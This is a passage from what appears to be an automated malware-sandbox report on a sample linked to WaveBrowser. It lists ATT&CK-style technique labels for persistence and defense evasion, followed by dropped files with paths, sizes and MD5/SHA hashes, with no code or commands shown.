  - Component Object Model Hijacking 1
  - Image File Execution Options Injection 1
  - Netsh Helper DLL 1

Defense Evasion
- Abuse Elevation Control Mechanism 1
  - Bypass User Account Control 1
- Direct Volume Access 1
- Impair Defenses 3
  - Disable or Modify System Firewall 1
  - Disable or Modify Tools 2
- Indicator Removal 2
  - File Deletion 2
- Modify Registry 5
Downloads
SHA1f19e545bb4b3c939be459e03b9de09ec9cdd3795
SHA25695af757d687ba0821111d4a40fc4861412d1b39707ce72c3220fbfc572d22e1a
SHA512cd2612155ec5e1352d46b6f402ba5bd8d3f208c4020155b7b978248fd09f10f7225c3a73fe017817366368f25437f1e37698b14e4f6ea58989b0a358c3c3a417
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{FEC39925-0779-4709-80BE-7DB02585A2E8}.tmp
Filesize 1024B
MD5 5d4d94ee7e06bbb0af9584119797b23a
SHA1 dbb111419c704f116efa8e72471dd83e86e49677
SHA256 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
SHA512 95f83ae84cafcced5eaf504546725c34d5f9710e5ca2d11761486970f2fbeccb25f9cf50bbfc272bd75e1a66a18b7783f09e1c1454afda519624bc2bb2f28ba4
-
Filesize 344KB
MD5 9772cf99f14ea49a1696d332d5fefc66
SHA1 9f77dbf43b70767f316228be37fd1e2e0b1ec1d3
SHA256 03ddfcc1603ec9669159a6398e586d7f54bc3146fe265c16647b2f5bd8758b70
SHA512 6f5b2c0124ec7d4a6038a51e6d5d8ecdf3594aa37e9973692bce325789ec276f02f4679606176e36db84e9eab0e2524e1039fd1c970862ab9da5776ca650b310
-
Filesize 1.2MB
MD5 7a3bc6142be9b7c9664464759974c08b
SHA1 7055fe5cf3e31a24687c3fcbc06394eaf097c6ae
SHA256 446839b455f486943d42e46c8230b6b00d59943de94449fc418ee626aba4dbef
SHA512 c881916068cfbd73425e1a6662d1049f02b8f1ed34b8546a9555d43b2b05ac3507e94f996435123a7694a2f2ddc4ef9f97d839b9a9584ae3ebca37f1b45d63cc
-
Filesize 1B
MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize 187KB
MD5 3008e7672855a4e6fbbb835c2a4d3e18
SHA1 fd1cd9538985773ef4b6b1cca8f9bb99e76fc8eb
SHA256 cf40f88d5b46c423f0243bd7ce1adc39bf52f19208eb763f08c36388068760a2
SHA512 6e1752f5bd155670c8aabe0ef97631257f4f2780b080978251df7a7bb0b18d1bea25dbe27a4e2a37cd77df3842f6b314001df5077fcd168d87fb239985f4e153
-
Filesize 796KB
MD5 18693249f3a283e83b8179e692ffbba9
SHA1 546c0d89f8c8096d22c6f6be7e843cf5ce08e220
SHA256 3d828bcccc628e7096856337b178da5608a6c3db99383374e6c49d50a1895e64
SHA512 1ab246fea99daf75831f26930d458a05ff0efd5f9c71c9c4396681a065fcf9f5c04af774df34ad55e140b71d41e42254ee2d9dabbb18009800bdfc62170a8c39
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 856KB
MD5 04398d23bf4733785de3a5ca05ad80c5
SHA1 72b193836a47aa3f0b7182de92a6a3f6f862131e
SHA256 a89ea036242d4e3345ad54ea9bcdb5c73ee5b78fa320996398bab4ae46cb578e
SHA512 1e7ba8e738c16af9267e7f9da427c23f2159214839d6e59bff66228375e9c7aea0f86c1ebd352cae248fd8508f762c1e81dd680e27cf7c1b5bd8084ab383148a
-
Filesize 688KB
MD5 c765336f0dcf4efdcc2101eed67cd30c
SHA1 fa0279f59738c5aa3b6b20106e109ccd77f895a7
SHA256 c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28
SHA512 06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891
-
Filesize 162B
MD5 bf28ef9468e4e1cbc5f3e055adfa69e5
SHA1 d5cff2ec3851f3fff649d688919f9f4f8511420e
SHA256 0e86dc475bac19122a3134a18cf8af26b83831df3346bcf5093739ca2891b4b3
SHA512 7b37e27f56b8ef1aeec6f25bbe7336ad0bec837af4390e47932adc67c9ed873c6b7cb5d643b39d0b6f383d79c7ee0ab8aa39e70f894ce8f2b90a884d1325c3f5
-
Filesize 6KB
MD5 1468a1a0ff233c86a8e2907d68340386
SHA1 b8967319c5608bd85e7f9a4dd9c0f84c4c27a1e9
SHA256 39842949b7fafd93d429c76c2866a7d6f140d3e4c5a3777304ef80b4b3167e51
SHA512 e0540178459087302fa88472f5b5d62382273b1babb26e932291cae875c9c8c0112149805992e337efa397ad24379be763cbede2d0c3a417af6b6d3adb86554e
-
Filesize 40B
MD5 c862cbbc1b82064465f98482ef73948b
SHA1 0e49a12b9d1fd903e0c44cfe9c9db0ae7a5b50fc
SHA256 988dfba4289e28ef42d0ce93bae58926ae7a9528de7bdf97898d1c2cd2f2016c
SHA512 12befd2966f25464dd21377d89b5d3c9b8fd9abaa8f257fe88bd1d80759fc5375439e6160f99dff7ec7a61135d9616992b611b63d1a6e094fe2eb29e23420559
-
Filesize 3KB
MD5 35a10dd7924dc7a4205fb3807812896b
SHA1 53583f9a14b35a9529614f7cb8c2f26a3a2a31a4
SHA256 43cdb582f3881db7584ba1cab29ca88c74bf51819033ea88a02b0614e398ee8d
SHA512 a7220a4c8cf583c334d78c108b7da9402a79eb2c57c428c5f740f8b2c6c19ac1c761da8d57074f2b9cfb063da84410f6558a8b61f978d536d9ac48428448a681
-
Filesize 3KB
MD5 b6ddadfa381c9d9297812d2dca3d92bc
SHA1 9f83febb785d4c87730164f7cf020d036e0e11f2
SHA256 6b2d97ac7dff812bbb826852feb506a4a300b7876fd6985e6b8a16ad710efe89
SHA512 d89a308fc1b9b6ba055e88ac91a830169547c8aea734a773762767fe4c6a76033a8d3f20b8e82c094239d25c8e2f17e4c9b1bcd083d294db368aa28f2cfe85f4
-
Filesize 1KB
MD5 8307716154566dd5d4b7f87f7e536824
SHA1 5b746f1c97a036b190d4cf1db76760902ae1ed87
SHA256 a7e44db42aa52a276edb6a2dea7dae1a8d1f683ae67d0179b5930271e3138d12
SHA512 8dcd2e9dea6c147a4c9578b42fd1613a55e790d3a6ddf98809f123cb06270784b0c0e3ae27bf2957e6066fd8bd831cc09777270e2bb8f6f7c144721f95e3c5fe
-
Filesize 1KB
MD5 8e84151e901f61a135d941979efd8ff9
SHA1 52841c4272dc039438ce59943489367d1f2e4482
SHA256 738e199707a5027486e17e9bfbd50a1dd295d2d6d5c48ccac17fecaec91b70a1
SHA512 c2e2c027d3655bd549ec59d75cbe307c8e6b66838c72949b965ce2c7ac3c730ffb873a948cc055f6727964cf048d403262e8262c6c6559410ae682e2963c013e
-
Filesize 323B
MD5 6d042405eecc3a8d20e4ab28907d7933
SHA1 4790ff19455ec59d278c127a244cb4ed0423b080
SHA256 20165d13fc4a1cae5eb52f42f4621ab71ef1a4dd8d069c7e390dff64f010760f
SHA512 8eca5fa2d29d30a944e784bb24d3814d544c2264f60893e52fee69a488c1ad6965ecf20a99c06ad40678dc886f70d00811057701458914bf05eadb6fec82cea8
-
Filesize 40B
MD5 3e5f4dac25a5a50e7a2d842f1e179bd3
SHA1 7378dc4cca7d974d07e9a51ba73b12f971ddd108
SHA256 f0673662177ebd8e79e9874d0e3213e64a35359b0cfb3ce154376e7c7c267f9f
SHA512 1e963326d9d694e219dda0610d03cbe80ec46408d39aa1b5d71483134143a92eb1f44dbf0a68f6446b876a6163345fe93d39d39d53ce29bafffb8e9b1db088a7
-
Filesize 12KB
MD5 95f14fa7cf5f40efb6aab13d6f879dd1
SHA1 9ccf36a812d0a8c396a3c3049c9802589a6f84d2
SHA256 0cf70eea2b4dffa36719b9a7bf9fb2f40a29728029b8d0bf05144c1a297899ce
SHA512 08b8bda79b3c0fbb48fc42b293bcb12443834242d5358117a22b595bd623d00e1ccc7a244e26e44a7c2e37108269ad4b0a629f97c4bcf2bee3ad5434b1a73afc
-
Filesize 23KB
MD5 c2935832073d69b70a3369efbd1490c1
SHA1 9c008bc89c0b6d50c89c6246e2061b58a9242f19
SHA256 aece29ef481c87f8fa1b6f0042637f0a8d721e0805004df23c13a96c3f1a214d
SHA512 e1f0e4b05f92e44beb4e7b3a39a113836cd1b8064658c41ae24a2d0f43df61334d0f4659fc48152c426cd1cbebccb6372328d440867e11fe4a047a2d3ac9b5f7
-
Filesize 48B
MD5 243c71f312f9205c709a5098be688ed3
SHA1 fe7a940ef3e1936419659ca17b175a2c2f5eb0de
SHA256 18c93c96dd3e67313a7e9ddba3c647427164cf1aeb9a66795f1305484e40f591
SHA512 0e68e482f988a21e31a0f80f0dcf409671baec7e7edcc1cd8ae0bbff6c26bc4db6cb6b176a193af1dbc32da8e89093a1e3fe958d88eab0f156da5a5cbc9fbcd0
-
Filesize 1KB
MD5 530117863f01dcd3f7c88152e195bc75
SHA1 f15adfd15e9cb519021289dabcd771eaa8197aaf
SHA256 cee586e554bfa72d5ac6a761d1d65719f06b5711af7e39de77a5faf78a77e67f
SHA512 98500acfdc78d7f34bdaabde5a40a516bf0c51c7db9a6f88199164d1535d83d76dfde8b4b29a807fc17851241c69d0ac67374df2331a9405565d37240d1fdc1f
-
Filesize 264KB
MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17
-
Filesize 8KB
MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
Filesize 8KB
MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
Filesize 8KB
MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
Filesize 41B
MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\background.js
Filesize 11KB
MD5 9e44b41428e8f1794bd94c1c1b80e795
SHA1 748bfde28c6f5821b1002d0aeb7ade573a69d8fd
SHA256 119bee705656331f59f3c7ace09c7e9a42496742a23f0405f6f1be01cabaea9a
SHA512 a3b48ddff3aa87d9bf35be67769f41c3048a257dae0779472692ced66e18aa8c1d7a721a5aaed67e95aed51df4e97cfac4a9d71e29add23675706d8127e12266
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\bbddbf12672a339b7dc0.png
Filesize 103KB
MD5 d6506d55722e451f4d13151ee693f680
SHA1 9b2f8a60d9da27b05429a9ab30d62c1c518da669
SHA256 d496c91adef2aa2223dc421188e0af4b083e052552d3a246e62d36483ffe269c
SHA512 55cfea26435d14a1bd5486167f79f1e65bd965e3aae05be36d61e0b38f813012621b8f2d32f2f0087f41009ab579def4f777ba5268deeae1ccbaaf9665c7120f
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\d3897737645de49087f1.svg
Filesize 10KB
MD5 136d1b4bf4b7adf44865978068718c94
SHA1 3383fcfaf01c48b73f9ce7f2f662d0115577f9ac
SHA256 1f345b3511f67dc4216077e858defc94df174e04e0c917a72f35f7c708b855cd
SHA512 e9d16dabec6a07f7652d97b340cda70f0d7b2893f940278a9b3b621ce0062294e335614dc2f397d4726c866355a176ad0048b272614e36a55247b32c2dba2ff7
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_active.png
Filesize 9KB
MD5 ed1684b544f174bedbbe56fff098d55e
SHA1 57156112678c4b69ed91c940acb7a5bfb4fd88bf
SHA256 1e5e0fe10bf786171e13fcb21d64f3fd6065a146d94e28362f9a4d1b748a4c09
SHA512 f85908f7df635a960a117be42e377785b193103893bd569dc74bf5085c67ed9dd947a21648f54aabee43eeb8e08ccf8ba95d275a63801d2643fd520a2be6556e
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_active_128.png
Filesize 9KB
MD5 4673bc2d427c607eeefb9d63d354ede0
SHA1 98d5204c36700b6726d24e74ef5d6c413dbcba7a
SHA256 65178d9950c22d956b00e2b4dae250baf20c3ec42bde65bfb592b262e8f1cb14
SHA512 515cd7f8d89395c34958a0494b502fb7e29965cf01320c61c13e66bbaa36c3ef8124bf99537cebe694e40c43bb3c58aac5550a4348e0e95e40098b2856def96d
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_active_16.png
Filesize 573B
MD5 77d8a759c443b390bfd3002d9730e820
SHA1 302091d092ca259a9d644ad2ea247018be964709
SHA256 bffc1f1f85bd444c6e2bb1c3da3c595b379c1b52f35af673143c72a3022ff5d5
SHA512 57c122c7080028f67f02ff15e1131fd250be2fb1cdbc14478cf4b52172130cf0ca4548b7134a87d7e6a1c9e3432d9c4a7b13c76608ca5ae104923268cf76a87a
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_active_32.png
Filesize 1KB
MD5 43df6293b8620911c69c8a99de75329a
SHA1 d534dde11a7d4ee4cce9c29c42616fbc274fd598
SHA256 b5e86cc3d5e48c2ab42f33a11660bc07868144a37bb9cd363b68f5f59a2c9713
SHA512 24d507260be213562ec289bc7f07ce0a1828e135b336755aca45ce24d16a47d72c9289a3e600490d8651ea0cc849bfd9ca2d37d71302f0bed6022d3f419dbd79
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_active_48.png
Filesize 1KB
MD5 342b54b4444668574ab0ef299cf94b04
SHA1 f16a82a3c376c380833b9c2f59bf784405c9b120
SHA256 17283c2e0d6479a0eb653cd6853e6dfe4b5b2222752d0e3561a9c2b3db3eaa8b
SHA512 1a322e20ffd14de6082071efec090d00b2dd7e28194c148b250a7ea52f0cda67cc5a77f71539552fc610d34891cda8d33d558dd21f0d000093328601177031fd
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_disabled.png
Filesize 7KB
MD5 9bd3c2b9ef38d034f61a2fefa8382684
SHA1 3328f6ff00107677c6ca25a87e7952c60dbf3a6d
SHA256 d1de05811ac158c96e6c59414031165e4a88eb6b48b593a1d90511a578921070
SHA512 2013c07257192d08d3cc7ed1ed22faa47472389238a445f05ba52258c8295739fa182ffdf41680575fbe6758446dc624f210b32a187e7a1861cb92b5926471d2
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_disabled_128.png
Filesize 5KB
MD5 9f13303775bab8c1da2ee041357498b8
SHA1 4cbb02f26fe05cc7d563f00124c067da8d8ff8b6
SHA256 23a9d2a492145a3f8e7d6e6af4facf63c4aa56075026f1e2f2c4969f9cb85db5
SHA512 88f753fe99604449aa8929bf23e4f177694cc17f1faaa3a3ff18a602e4f00c01ae7e2602d5a8b363ef23bd2732f63361873b845e9062e4a2dfe09c952fe541a2
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_disabled_16.png
Filesize 591B
MD5 f26a633ef6d8deb06af98c0297dd377f
SHA1 cf5bcbe22640f4e916421883fa55b7be489036b6
SHA256 a4ad504d5604ebb417640ddfdb994822fcdb7c722705b0c4dd7eb30d120ad65c
SHA512 01b5d1047400c6407605804e16a8aae6d35d45ecc8521de635eeb47a5af6b7eabc737e346f5719c8912df0a7a7942c011780ee5c533343300bcfafc72702b922
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_disabled_32.png
Filesize 1KB
MD5 e19026ff54589a33003a07f85d55b0fa
SHA1 61f80d7705209f71fe786e949cf8e2b14fe3f5f3
SHA256 3e2a29c243afbaaf66113a8984b23eba192f37cf6464b16b0509353f4290fd5d
SHA512 11b8b217d800594c97251739437867fb614b11384ddac75f5c2866958d3e0e1d47794154f8a686900de8151ac2a7fb49254a13e8e9152eb5f070fad4a5f8372c
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\icons\icon_disabled_48.png
Filesize 1KB
MD5 65786452dc69c7f21273519ab9d5cc09
SHA1 96e2b0815d8e74b304f4be725b8746712cf4c4ee
SHA256 02558efb6c057f740cab6e907f6d472be5d538c6c8ab0a2d4df3497aeacec92a
SHA512 bd3087bd0c97b843f3bd78006898e4a796e8ed185fd9e6ca2e40dbae62c0aa6120765bc8539f7bb48d3ba34bafae9a21bea83f6347b7cd57fb75cc826193cc08
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\manifest.json
Filesize 1KB
MD5 22ed7d699466b23bb9c77b39567e5e49
SHA1 12c8b60e8756b40efeb6518784e6e57492d96d51
SHA256 f94376d79e56f588f1977ad4d574dadd4172c184662a501bbadc365dca027774
SHA512 22fc94df1794581a21076630567716ba43f7f0795b4ac293462dfe7403ea55c10584dad8977a18cf9cc1a5092ac5ae60c1951b3ca630aaf4168cc79f66e04c57
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\popup.html
Filesize 230B
MD5 8dbeb11860aa56321c607337cbcb86e6
SHA1 c209b2465a5821a5ec9e8d30b90fad362a500933
SHA256 d05e125f910c646a127da2be326c62a1648bc90a3ca682afdfca6a2bfc5387d1
SHA512 1f3ffe249bdf93a935ded209a27436d6645acc83efee224a1d10b934eeda87599a1ea7cf14fc333691e5c5cc8e2ca05534ff41f17f3721b085ca50766b8be449
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\Temp\scoped_dir3796_1470163672\CRX_INSTALL\popup.js
Filesize 82KB
MD5 6b72531e17ae11282061c035f7a71b03
SHA1 b99ba4e4bf5ec5d611ab56a54f1d8493be99a643
SHA256 1de06fc52b09897637b4cdfb49421746adbddc7e81feb6f5b05513b56b93cdfb
SHA512 418f79818abd96616c7861c256113a134c564e48e0c4a0a83f24700e74634ccf6219440ad64de44b27f61cffc6f80a3e76e502b17dbc09239ddfb5c11ca64378
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\cboeampladkmkcbnnepgijfpdgmeaapc\1.0.1_0\contentScript.js
Filesize 193KB
MD5 f51ac25bc69b10b94385af2eb46ed86e
SHA1 2fd062ac0e474a067bd0335980840a69c282e9c9
SHA256 9d04dd37cb36276203523f8bdce0920d42ae86fc1263520ad1f7d281718878ea
SHA512 09c665c4ba5b22cb37da4f0fc1b865d0f020e1ff9fba8a478d957890b885ea75aab0b645184fe0f57f0bfcce3d0e0c5cad98c7560b9d95b767e82f632309a9e3
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\hbgjioklmpbdmemlmbkfckopochbgjpl\1.0.0_0\preferences_schema.json
Filesize 7KB
MD5 a192304f63ef26c80086f835cc4b7ada
SHA1 6963e90e752209132b728a938844c4c64dc94d43
SHA256 4f72309f9378f04b3f1cb8f46b031ff513ac63e5056d96272f2bdc6d39dcddf9
SHA512 be619909cd0c3465966a4018847310c1493bfdecad6f07bb28293f3dcea73dc377f5d52cca040d626368e17828eae28384fe51d20c4a71925c5f31eea8e18561
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Extensions\mccchmdkmjpgjlhckmbinjaioihkcnkc\1.0.8_0\images\x48\icon_a.png
Filesize 2KB
MD5 c05285aad074c0872dd78908176b1052
SHA1 b8a5926d153dfbc503a38a749baf9099903c289f
SHA256 9a4a7e0c2969562d5d1299f80317d4560265b4a843cf17491c7d36fa74a91cc1
SHA512 6006b22ff83d0afdc346179a4c2dbbf927efcc62fcf9105fb45efd768bdba62af5839c3efb21e2555e0090639ab2dca76397d294b51db0dca768def53ce00a1a
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\000003.log
Filesize 26KB
MD5 94d2b0e85db504ae83f8ba14c74bb8cb
SHA1 2fb681537d2a4986de5a79c1436c04b819ec32b1
SHA256 5cd3fa3edffd3fc43ef1021b77a939f52aaa54db5e3497f6ddc5b70a0f00b2bc
SHA512 1e8fa7e1bb35f794a652e204b52b42bf4a6bb6803c4c1a23bb021adae47324ff6b506f691cb0fb855280165756a40f4e54878ee6fe42280d94ea2d8f370b72ff
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\LOG
Filesize 441B
MD5 3711a6216d6509e8d396694017859e75
SHA1 b37d0fa1b64e4bd5785d1cdfbcf98c2879a5ee85
SHA256 917de94c7786f293ab3bc343e4c726783d03dfa259686e01c81bf22553d92f12
SHA512 e12c4635be4a5f9a2cf50dee81cddeb48aae614ec7f0c49c1fd55eb7bd40599859e112abbeea0476a303eb1dce4654b88e2dbd74f733c0bc3fa72c0e93653105
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\LOG
Filesize 441B
MD5 51ba2f2311249617fe42a01b843a7fe5
SHA1 2b7e9aaaf797845c76d72896ee7d6846c752606c
SHA256 018c572fad47a63cd17d9ca5730612fbad0a65e9306255c55ab31114edb6ad88
SHA512 8b918db4fedd1d05e579c3a82fdde1039c96b8d453c54b853f85c4b2a5c3a2d34c81ba084467acd6651673d7855bfef9887a4cb7cdf3861a475c42cc6266a528
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\LOG
Filesize 441B
MD5 3e5ae45d5188c56de8ee5360f18a45b7
SHA1 f760f4e1c0daaf19da591e6c6f874a2f3be6a609
SHA256 222eb9efb2afa23989ba84b189c56ff50e88e8f1bd0fed6d1ff5609e4428b62a
SHA512 8d3d156d7a08dfb66673e86a26f1915d6294d0b2aa042e452053621caed47f314fbde46e448412a089b23be4cadc4b70f0685340bb3f3295b6eec3be47e38662
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\LOG.old
Filesize 401B
MD5 e497a961a2949122ea955553fab9d401
SHA1 8a49094e99b5e176f4c447ed0b5cfb5af230ff3e
SHA256 bf07df4ceb50a97038c2cd54f7fcfed42d904fc476505f516c2b5f1e82b106b2
SHA512 36ef7c113f42552afd0651f8fc65e710a1739b5009d0b9067b716180da4471365af3ca23ff27b2d977d04993498f3ae989c28ec5973d14f27b0b5f11e0e41d89
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\IndexedDB\chrome-extension_gbohaofhodnpniflcnancekmknlomeck_0.indexeddb.leveldb\MANIFEST-000001
Filesize 23B
MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
Filesize 8KB
MD5 512efc9eef827287f451d2f4cca100ae
SHA1 cbed3230e9e51bbf816e1c8de1e351b3f2c3193f
SHA256 8643563925aa62a51f1dd45131cf4ebca0491b13613e6c2f2114294645e4fbdb
SHA512 6e19a3337ece8bbbc9c9160f9bd88a53cabaa958a828904c1b48d13bc333500d2a03088f475099fb05729cefa002869103ec1c4cc2445e8786a6bbfdbb049645
-
Filesize 7KB
MD5 9140696814bee514a88c896264653b2c
SHA1 b2bbcf22ec3fe11dee468290bd2892566135ea80
SHA256 7326b8226c450ab1a15564aeda19bf77a915ce239aede73dce038f641d50168f
SHA512 35ef2e77c14be703cfb1dff0b5eb44562e758c1e2e471ed121d35dbb74aabf82e7d794b4249be55451d21486a5c31cce151418c9be2f3dc7441831d7acc516f3
-
Filesize 8KB
MD5 15452a7cd1e0a4ea7f1d596118010a7c
SHA1 22208fe8a4cbd2a54854ac769f113912a7bd9047
SHA256 745551023c829619eb8c51a7461af52ce44fee3fc3bb543048a5a4d4ce8baaf3
SHA512 cb12ef7bb494914fa2a499ed7c9dbe6754c3f3ca4189e8da8629c9ddbf21b24d3c4dabdef8a96a44b31caf74000dda80ce6eae55ad3211911288a37b31cd7241
-
C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Default\Network\Network Persistent State~RFe5be329.TMP
Filesize 59B
MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize 1KB
MD5 2c55c61e07da4986e4a815d30c90f836
SHA1 7b973ea2cc8ab2f61097654fceaaa9759c464f19
SHA256 65860bd8c5f733ad528d4decae005c95b6c8ab9634748691cb873d03fa156466
SHA512 fba49806ae02b9141f7c33a471132c203d4fcba4d4e16ee0414d5a4226bdb603e78889fe19c4ca6553baf69e9b90b45cd5abf8a68547cbb516b7c581d2a43fde
-
Filesize 1KB
MD5 d37e5ca44268cb13392ec1be754a7e6c
SHA1 f3d32948c27706b5c270ed0b6f822da78c9235cc
SHA256 bd113af01934d9faecf707b79192e3e5ffa214d05dc1be86a712a6d3e5bee482
SHA512 09081c7976194f93cb709c22284276b0a7512528c01dd6a33cc6d3edfa356b3b4b37acb0b1037deb9f33c2f5cfb678a2c1e6f78739a6c0ebde850cc2a0f4d6aa
-
Filesize 1KB
MD5 f745a5a835e2ed46ab257a72a1e6ff9f
SHA1 c0e30eab480ac29990556b02e15c9e8464d35534
SHA256 fef7717c4200c20dd1e4b703954719511a8865981a9515fa379f62b1ba6eef6f
SHA512 fee2b71d0e508c29dce36317b8fbb841304ecd3458788064eca651f3276d4f3817ba1372f0850fe16e822ce0b9a7ece9a6f4dd491748e626fc402911998df3cc
-
Filesize 1KB
MD5 2300cfd05dfc8ea290ddc08776094aa2
SHA1 2605f37ee7f155931c15fd8fdef0ab080c30be60
SHA256 bac351db24c82f897a1f1bd9d117268f6811aad1c8d830b08bf577c89f74947e
